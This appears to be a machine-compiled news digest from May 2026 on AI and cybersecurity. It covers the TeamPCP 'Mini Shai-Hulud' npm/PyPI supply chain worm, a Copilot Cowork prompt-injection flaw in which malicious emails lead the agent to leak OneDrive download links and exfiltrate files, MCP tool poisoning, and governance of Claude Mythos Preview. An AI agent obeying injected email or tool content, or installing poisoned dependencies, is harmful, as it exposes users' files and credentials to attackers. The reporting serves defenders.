The Information Machine

AI as Attack Tool and Attack Target: May 2026 Cybersecurity Moment · history

Version 10

2026-05-26 18:23 UTC · 248 items

What

The Mini Shai-Hulud supply chain campaign — launched May 11, 2026 by threat actor TeamPCP — has compromised 170+ npm and PyPI packages, breached approximately 3,800–4,000 GitHub internal repositories [4][6], exposed 30 EU institutions via the Trivy container-security scanner [11], and potentially extends to axios, one of the most downloaded JavaScript libraries in history [20]. On May 26, Simon Willison documented a concrete data exfiltration vulnerability in shipping Microsoft Copilot Cowork: prompt injection via malicious emails can leak OneDrive pre-authenticated download links, enabling file access without user approval [29]. MCP servers have simultaneously emerged as a recognized AI attack surface, with Microsoft, Datadog, and Palo Alto Networks all publishing on indirect prompt injection risks [30][31][32]. The AI governance thread centers on Claude Mythos Preview — the first AI system to autonomously complete AISI offensive cyber ranges — remaining withheld from deployment while NIST's CAISI serves as the US pre-deployment compliance gate [23][27].

Why it matters

Two threats are converging: AI systems exploited as attack vectors (supply chain weaponization via coding agents, MCP injection) and AI systems exploited as attack targets (Copilot Cowork data exfiltration, tool poisoning). The Copilot Cowork finding demonstrates that preventing data exfiltration is structurally unsolved in shipping agentic products, while the potential axios compromise illustrates how a single credential theft can cascade into transitive risk across hundreds of millions of projects — and the AntV wave's Sigstore badge-faking technique means standard provenance attestation cannot detect it.

Open questions

  • Is the axios npm compromise documented by Huntress [20] confirmed as part of the Mini Shai-Hulud campaign, and if so, how does it change exposure estimates beyond Mandiant's 1,000+ SaaS environments figure?

  • Has Microsoft issued a CVE or patch for the Copilot Cowork prompt injection data exfiltration vulnerability documented by Simon Willison [29], and does the same architecture flaw affect other Copilot products?

  • What does SOCRadar's formal dark web profile of TeamPCP [21] reveal about the group's identity and infrastructure — and does it connect TeamPCP to the Lapsus$ extortion activity reported by CSO Online [33]?

  • Does CAISI's voluntary framework evaluate models that labs withhold from public deployment, or only released models — leaving frontier capabilities like Claude Mythos outside public oversight? [26][27]

Narrative

The Mini Shai-Hulud supply chain campaign, launched by threat actor TeamPCP on May 11, 2026, began as a self-spreading worm targeting npm and PyPI packages, ultimately compromising more than 170 packages — including TanStack, LiteLLM, Guardrails AI, and Telnyx — and exfiltrating code-signing certificates from two OpenAI employee devices, triggering a mandatory app certificate rotation deadline of June 12, 2026 [1][2][3]. GitHub confirmed the theft of approximately 3,800–4,000 internal repositories via a poisoned VS Code extension (Nx Console version 18.95.0), with Forbes reporting a $50,000 ransom demand [4][5][6]. CVE-2026-33634 (CVSS 9.4) was formally assigned and added to CISA's Known Exploited Vulnerabilities catalog [7][8], Broadcom confirmed downstream exposure in Tanzu Application Platform and Spring Enterprise through the Trivy container-security scanner [9], and Mandiant quantified total campaign impact at more than 1,000 compromised SaaS environments [10]. CERT-EU officially confirmed that the European Commission's cloud infrastructure was breached via the same Trivy vector, exposing data across 30 EU institutions [11][12].

The campaign's second wave — characterized by the Cloud Security Alliance as 'Shai-Hulud/Megalodon' — involved 600+ malicious npm packages in the AntV data visualization ecosystem that used a novel technique to fake Sigstore security verification badges, undermining a primary supply chain trust signal without triggering standard provenance checks [13][14]. Socket.dev traced the campaign's initial access to a phishing attack against npm package author 'Qix,' whose compromised credentials seeded the broader worm [15]. Snyk's identification of a Bun-based stealer and Socket.dev's SAP CAP analysis documented specific malware components in the enterprise segment [16][17], while RedRays and Mend.io framed the SAP attack as deliberately designed to weaponize AI coding agents by injecting malicious packages into dependency trees those tools automatically install [18][19]. The most consequential potential expansion is Huntress's documentation of an axios npm compromise [20] — axios is a transitive dependency for hundreds of millions of JavaScript projects, meaning confirmed inclusion in the campaign would dwarf all previously quantified exposure figures. SOCRadar has published a formal dark web profile of TeamPCP [21], and WIRED characterized GitHub as 'just the latest victim' of a serial campaign [22], signaling the incident has crossed into mainstream security awareness.

The AI governance dimension centers on AISI's official evaluation of Claude Mythos Preview, which autonomously completed both UK offensive cyber ranges — including a 32-step scenario — making it the first AI system to do so [23][24]. The Turing Institute's CETAS has assessed the structural implications of this capability threshold [25], and AuthMind argues that Anthropic's decision to withhold Mythos from public deployment is a significant policy signal: if labs retain their most capable models in reserve, voluntary frameworks like NIST's CAISI may evaluate a curated rather than frontier subset of AI capability, leaving the most dangerous systems outside public audit [26][27]. The Foundation for American Innovation has defended CAISI as a pragmatic first step toward structured federal oversight [28], while Zvi Mowshowitz has characterized governance anchored in cybersecurity as politically captured.

On May 26, 2026, Simon Willison documented a concrete data exfiltration vulnerability in shipping Microsoft Copilot Cowork: agents can send emails to users' inboxes without approval, and because those emails can contain external images triggering network requests, attackers can exfiltrate data when a user opens a compromised message [29]. OneDrive's pre-authenticated download links can also be leaked via successful prompt injection, allowing file access without further authentication [29]. Willison frames preventing data exfiltration as 'the biggest challenge in designing agentic systems' — a characterization aligned with the broader institutional discourse around MCP servers as an emerging attack surface, with Microsoft, Datadog, and Palo Alto Networks all publishing on indirect prompt injection risks in MCP environments [30][31][32]. These findings establish that AI systems face attack not only through their software dependencies but through the agentic capabilities they expose to adversarial external content.

Timeline

  • 2026-05-05: NIST's CAISI formalized as US pre-deployment AI compliance gate through expanded safety-testing agreements with Google, Microsoft, and xAI [27]
  • 2026-05-11: TeamPCP launches Mini Shai-Hulud worm; 160+ npm and PyPI packages compromised including TanStack; two OpenAI employee devices hit, code-signing certificates exfiltrated [1][2][3]
  • 2026-05-11: Security researchers confirm tool poisoning attacks work silently against Claude, ChatGPT, Cursor, and other major AI assistants [45]
  • 2026-05-13: OpenAI publishes incident response and mandates app certificate rotation by June 12; AISI characterizes Claude Mythos Preview's autonomous clearance of UK offensive cyber ranges as a genuine AI capability threshold [1][44][24]
  • 2026-05-18: Reports emerge that TeamPCP targeted Mistral AI and is selling access to its internal source code repositories [46][47][48]
  • 2026-05-19: LiteLLM, Telnyx, and Guardrails AI identified as compromised; CVE-2026-33634 formally assigned with CVSS 9.4 critical severity rating [49][7][50]
  • 2026-05-20: GitHub confirms TeamPCP breach of approximately 3,800–4,000 internal repositories via poisoned Nx Console VS Code extension; Forbes reports $50,000 ransom demand [4][35][5][6]
  • 2026-05-21: CVE-2026-33634 scope expanded to include Trivy container-security scanner; LiteLLM publishes official security update; Aqua Security publishes formal Trivy advisory [51][52][53]
  • 2026-05-22: Mini Shai-Hulud confirmed targeting SAP npm packages; CISA adds CVE-2026-33634 to Known Exploited Vulnerabilities catalog; Broadcom issues Tanzu and Spring Enterprise impact assessment [54][8][9]
  • 2026-05-23: AntV ecosystem attack confirmed with 600+ malicious packages faking Sigstore badges; CSA characterizes campaign as two-wave 'Shai-Hulud/Megalodon'; RedRays and Mend.io frame SAP attack as weaponizing AI coding agents [14][13][18][19]
  • 2026-05-24: CERT-EU confirms European Commission cloud breach via Trivy across 30 EU institutions; Mandiant quantifies total campaign at 1,000+ compromised SaaS environments; CSO Online reports Lapsus$ has joined the extortion wave [10][11][12][33]
  • 2026-05-25: Socket.dev identifies phishing attack on npm author 'Qix' as initial access vector; TanStack publishes official postmortem; Huntress documents axios npm compromise; AuthMind and Turing Institute CETAS publish Mythos governance analyses [15][55][20][25][26]
  • 2026-05-26: Simon Willison documents data exfiltration vulnerability in Microsoft Copilot Cowork via prompt injection; Microsoft, Datadog, and Palo Alto Networks publish on MCP servers as an AI attack surface; SOCRadar publishes formal dark web profile of TeamPCP [29][30][31][32][21]

Perspectives

GitHub

Confirmed theft of 3,800–4,000 internal repositories via poisoned VS Code extension while maintaining that customer data was unaffected and impact was limited to internal code

Evolution: WIRED's characterization of GitHub as 'just the latest victim' of a serial TeamPCP campaign directly contests GitHub's incident-specific containment framing; additional social media amplification reinforces the serial-campaign narrative

OpenAI

Framed the TanStack supply chain incident as an industry-wide threat with limited blast radius — no customer data or production systems compromised — while issuing a June 12, 2026 certificate rotation deadline as the actionable user requirement

Evolution: The potential axios compromise, CERT-EU's 30 EU institutions, and Mandiant's 1,000+ SaaS figure collectively challenge the 'limited blast radius' characterization for the campaign as a whole

Mandiant + CERT-EU

Quantified the campaign at 1,000+ compromised SaaS environments and officially confirmed the European Commission's cloud infrastructure was breached via Trivy, exposing data across 30 EU institutions — establishing that supply chain DevSecOps vulnerabilities translate directly into government IT compromise

Evolution: Consistent; these are the authoritative scale figures anchoring the campaign's confirmed impact

Simon Willison

Documents a concrete data exfiltration vulnerability in shipping Microsoft Copilot Cowork — prompt injection via malicious email can leak OneDrive pre-authenticated download links — and frames preventing data exfiltration as the central unsolved challenge in agentic AI design

Evolution: New voice this pass; the Copilot Cowork finding is the most direct evidence to date of an AI system being exploited as an attack target in a shipping product, adding a non-supply-chain dimension to the thread

AISI (UK AI Safety Institute)

Claude Mythos Preview represents a genuine capability threshold — the first AI system to autonomously complete both AISI offensive cyber ranges including a 32-step scenario — warranting serious institutional attention to what autonomous AI cyber capability means for security

Evolution: Consistent; the Turing Institute CETAS and AuthMind have added academic and policy weight to the governance implications of this threshold

AuthMind + Turing Institute CETAS

Anthropic's decision to withhold Mythos from public deployment is a significant policy signal — voluntary frameworks like CAISI may evaluate a curated rather than frontier subset of AI capability if labs retain their most capable models in reserve, leaving the most dangerous systems outside public audit

Evolution: Consistent; the Foundation for American Innovation's defense of CAISI as a pragmatic first step adds a countervoice, but does not address the 'withheld model' gap AuthMind identifies

Snyk + Socket.dev + RedRays (security research community)

Provide the most technically granular public analysis across multiple campaign fronts: Bun-based stealer malware in SAP CAP packages, Qix phishing as initial access vector, and AI coding agent dependency injection as the specific mechanism by which automated package installation becomes an attack surface

Evolution: Consistent; Snyk's dedicated TanStack analysis and Socket.dev's Qix phishing attribution remain the deepest public technical record of the campaign's mechanics

Mend.io + MCP/agentic AI attack surface concerns

The SAP segment of the campaign ran 'via Claude Code,' implicating Anthropic's specific AI coding assistant as a vector; the Copilot Cowork vulnerability and MCP security publications from Microsoft, Datadog, and Palo Alto Networks extend this concern from supply chain poisoning to any agentic system that can be fed adversarial content

Evolution: The Copilot Cowork finding and institutional MCP security publications have expanded the AI-as-attack-vector concern into a structural challenge across multiple shipping products — while Anthropic still has not responded to the Claude Code attribution

Tensions

  • GitHub's 'customer data unaffected, limited impact' framing sits in direct tension with WIRED's characterization of GitHub as 'just the latest victim' of a serial TeamPCP campaign — the serial framing implies systematic targeting rather than opportunistic compromise, which is inconsistent with GitHub's incident-specific containment narrative [4][35][5][22][6]
  • AISI's 'autonomous offensive threshold' characterization of Claude Mythos Preview is contested by independent cybersecurity commentators who question the evaluation methodology and system card consistency, creating a debate about whether the milestone is accurately characterized or inflated [23][24][41][42][25]
  • The AntV attack's fake Sigstore security verification badges mean that npm provenance attestation — a primary trust signal in standard supply chain guidance — cannot detect this campaign, creating a gap between the remediation advice being given and the attacker evasion capabilities demonstrated; neither Sigstore nor the npm registry has issued a public response [14][13][43]
  • OpenAI's 'limited blast radius' framing sits in tension with expanding downstream evidence: CERT-EU's 30 EU institutions, Mandiant's 1,000+ SaaS environments, Lapsus$'s reported entry into the extortion wave, and the potential axios compromise [1][11][10][33][20]
  • CAISI's voluntary pre-deployment framework, defended by the Foundation for American Innovation as a pragmatic first step, is challenged by AuthMind's argument that if labs withhold their most capable models, voluntary frameworks evaluate a curated rather than frontier subset of AI capability — and by Zvi Mowshowitz's critique that governance anchored in cybersecurity is politically captured and insufficiently general [27][28][26][44]
  • Mend.io's specific 'via Claude Code' attribution of the SAP attack to Anthropic's tool versus RedRays' generic 'AI coding agents' framing remains unresolved without an Anthropic response — and the Copilot Cowork vulnerability and MCP attack surface discourse now demonstrate the agentic AI attack vector extends structurally across multiple products, complicating any single-vendor attribution [19][18][29][30][31]

Sources

  1. [1] Our response to the TanStack npm supply chain attack — OpenAI Blog (2026-05-13)
  2. [2] Mini Shai-Hulud: TeamPCP compromette 160+ pacchetti npm e PyPI in un supply chain attack che ha colpito TanStack, Mistra... — reactive:ai-security-nexus (2026-05-19)
  3. [3] A Self-Spreading Supply Chain Attack Compromises TanStack npm ... — reactive:ai-security-nexus
  4. [4] Nx Console 18.95.0 Incident: How TeamPCP Breached GitHub — reactive:ai-security-nexus
  5. [5] GitHub Says 3,800 Repositories Breached—TeamPCP Hackers ... — reactive:ai-security-nexus
  6. [6] GitHub just confirmed that attackers stole about 3,800 internal repositories after a poisoned VS Code extension compromi… — Rohan Paul Twitter (2026-05-20)
  7. [7] GitHub - ugurrates/teampcp-supply-chain-attack: CVE-2026-33634 (CVSS 9.4) — The most impactful CI/CD supply chain attack of 2026 so far. · GitHub — reactive:ai-security-nexus
  8. [8] CISA Adds Trivy CVE-2026-33634 to KEV: Patch Supply Chain Risk ... — reactive:ai-security-nexus
  9. [9] Impact Assessment: Aqua Security Trivy Supply Chain Compromise (CVE-2026-33634) on Tanzu Application Platform and Spring Enterprise — reactive:ai-security-nexus
  10. [10] TeamPCP Supply Chain Campaign: Update 006 - CERT-EU Confirms European Commission Cloud Breach, Sportradar Details Emerge, and Mandiant Quantifies Campaign at 1,000+ SaaS Environments — reactive:ai-security-nexus
  11. [11] European Commission cloud breach: a supply-chain compromise — reactive:ai-security-nexus
  12. [12] European Commission breach exposed data of 30 EU entities ... — reactive:ai-security-nexus
  13. [13] Shai-Hulud/Megalodon: A Two-Wave AI Developer Supply Chain ... — reactive:ai-offensive-cybersecurity
  14. [14] Mini Shai-Hulud Returns: 600+Malicious npm Packages Fake Sigstore Badges in AntV Ecosystem Attack — reactive:ai-security-nexus
  15. [15] npm Author Qix Compromised via Phishing Email in Major Suppl... — reactive:ai-security-nexus
  16. [16] Bun-Based Stealer Hits SAP CAP npm Packages | Snyk — reactive:ai-security-nexus
  17. [17] TeamPCP-Linked Supply Chain Attack Hits SAP CAP and Cloud MT... — reactive:ai-security-nexus
  18. [18] SAP npm Packages Hijacked to Steal Cloud Credentials and Weaponize AI Coding Agents — reactive:ai-security-nexus
  19. [19] Shai Hulud: SAP CAP Supply Chain Attack Via Claude Code — reactive:ai-security-nexus
  20. [20] axios npm Compromise: The Ultimate Supply Chain Scaries — reactive:openai-advanced-account-security
  21. [21] Dark Web Profile: TeamPCP — reactive:ai-security-nexus
  22. [22] GitHub is just the latest victim of TeamPCP, a gang that has ... — reactive:ai-security-nexus
  23. [23] Our evaluation of Claude Mythos Preview's cyber capabilities — reactive:frontier-ai-cyber-capabilities
  24. [24] How fast is autonomous AI cyber capability advancing? — reactive:ai-offensive-cyber (2026-05-13)
  25. [25] Claude Mythos: What Does Anthropic's New Model Mean for the ... — reactive:ai-security-nexus
  26. [26] When a Lab Withholds Its Best Model: What the Claude Mythos System Card Signals for Cybersecurity — reactive:ai-security-nexus
  27. [27] US government expands vetting of frontier AI models for security risks — reactive:ai-security-nexus
  28. [28] Kicking the Tires: A Voluntary Path to Pre-Deployment AI Vetting | The Foundation for American Innovation — reactive:ai-security-nexus
  29. [29] Microsoft Copilot Cowork Exfiltrates Files — Simon Willison (2026-05-26)
  30. [30] Protecting against indirect prompt injection attacks in MCP — reactive:anthropic-rapid-ascent
  31. [31] MCP servers have become a new attack surface in AI systems ... — reactive:ai-security-nexus
  32. [32] MCP Security Exposed: What You Need to Know Now — reactive:ai-security-nexus
  33. [33] Trivy supply chain breach compromises over 1,000 SaaS environments, Lapsus$ joins the extortion wave | CSO Online — reactive:ai-security-nexus
  34. [34] GitHub Breach via Malicious VS Code Extension: What You Need to ... — reactive:ai-security-nexus
  35. [35] Nx Console VS Code Extension Compromised - StepSecurity — reactive:ai-security-nexus
  36. [36] OpenAI caught NPM supply chain chaos after employeedevices compromised — reactive:ai-security-nexus (2026-05-16)
  37. [37] OpenAI asks macOS users to update after TanStack npm ... — reactive:ai-security-nexus
  38. [38] TanStack npm Supply Chain Attack Prompts OpenAI Updates — reactive:ai-security-nexus
  39. [39] Claude Mythos Preview: Analysis of Anthropic's Public Announcement — LessWrong — reactive:ai-deployment-misalignment-risk
  40. [40] TanStack npm Packages Hit by Mini Shai-Hulud | Snyk — reactive:ai-offensive-cybersecurity
  41. [41] Anthropic's Mythos Claims Questioned by Cybersecurity Insider — reactive:frontier-ai-cyber-capabilities
  42. [42] Why Claude Mythos system card is a mess - Part 3, about ... - Reddit — reactive:ai-security-nexus
  43. [43] Mini Shai-Hulud npm Attack: AntV Ecosystem Compromise (May 2026) | Chainguard — reactive:ai-security-nexus
  44. [44] Cyber Lack of Security and AI Governance — Zvi's AI Roundups (2026-05-13)
  45. [45] 😺 Microsoft: your company is the AI bottleneck — The Neuron (2026-05-11)
  46. [46] TeamPCP vende repo Mistral AI dopo attacco TanStack su OpenAI — reactive:ai-security-nexus (2026-05-18)
  47. [47] TeamPCP Claims Sale of Mistral AI Repositories Amid Mini Shai ... — reactive:ai-security-nexus
  48. [48] Hackers Put Mistral AI Source Code Up for Sale After Supply Chain Attack — reactive:ai-security-nexus
  49. [49] Mini Shai-Hulud Worm Compromises TanStack, Mistral AI, Guardrails AI & More Packages — reactive:ai-security-nexus
  50. [50] LiteLLM and Telnyx compromised on PyPI: Tracing the TeamPCP ... — reactive:ai-security-nexus
  51. [51] NVD - CVE-2026-33634 — reactive:ai-security-nexus
  52. [52] LiteLLM Supply Chain Attack: What Happened and How to Respond — reactive:ai-security-nexus
  53. [53] Trivy and LiteLLM Supply Chain Incident (CVE-2026-33634) Update — reactive:ai-security-nexus
  54. [54] Shai Halud: What is Shai-Hulud? Definition & Explanation of the Self-Replicating npm Worm | Kusari® — reactive:ai-security-nexus
  55. [55] Postmortem: TanStack npm supply-chain compromise — reactive:ai-security-nexus